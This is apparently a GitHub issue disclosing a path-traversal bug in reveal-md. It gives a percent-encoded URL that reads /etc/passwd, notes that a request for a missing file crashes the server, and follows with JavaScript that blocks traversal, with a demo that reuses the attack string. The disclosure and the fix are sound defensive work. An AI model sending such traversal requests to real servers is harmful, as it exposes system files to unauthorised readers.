Arbitrary file read leads to access to all local files
W0rty opened this issue
W0rty commented
Run an instance of reveal-md (from source code or Docker Hub), and then reach the following URL:
http://localhost:1948/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd
This will leak /etc/passwd of the local machine (or Docker).
Moreover, if we try to reach a non-existent file, the server will crash because there is no catch for the exception "ENOENT" (no such file or directory).
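A containment check that addresses both behaviours in this report, as an added example (not reveal-md's code and not part of the original issue): the request path is decoded once, resolved against the served directory, rejected if it lands outside it, and a missing file becomes a 404 instead of an uncaught ENOENT. `resolveRequest` and `demo` are hypothetical names, and the temporary directory and `slides.md` are constructed sample input.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// True when p is rootDir itself or a path below it.
const inside = (rootDir, p) => p === rootDir || p.startsWith(rootDir + path.sep);

// Map a raw (still percent-encoded) URL path to a file under rootDir.
// Returns { status, file? } and never throws on attacker-controlled input.
function resolveRequest(rootDir, rawUrlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawUrlPath); // turns ..%2F into ../ before any check
  } catch {
    return { status: 400 };                   // malformed percent-encoding
  }
  if (decoded.includes('\0')) return { status: 400 };

  const root = fs.realpathSync(rootDir);
  // Lexical resolution collapses "etc.md/.." style segments as well.
  const candidate = path.resolve(root, '.' + path.sep + decoded);
  if (!inside(root, candidate)) return { status: 403 };

  try {
    const real = fs.realpathSync(candidate);  // throws ENOENT for missing files
    if (!inside(root, real)) return { status: 403 }; // symlink pointing outside root
    if (!fs.statSync(real).isFile()) return { status: 404 };
    return { status: 200, file: real };
  } catch (err) {
    const missing = err.code === 'ENOENT' || err.code === 'ENOTDIR';
    return { status: missing ? 404 : 500 };   // answer the request, do not crash
  }
}

// Constructed sample: a temp directory holding one deck, queried four ways.
function demo() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'slides-'));
  fs.writeFileSync(path.join(root, 'slides.md'), '# constructed sample deck\n');
  const reported = '/' + '..%2F'.repeat(13) + 'etc.md%2F..%2Fetc%2Fpasswd';
  const urls = ['/slides.md', reported, '/missing.md', '/%E0%A4%A'];
  return urls.map((u) => resolveRequest(root, u).status);
}
```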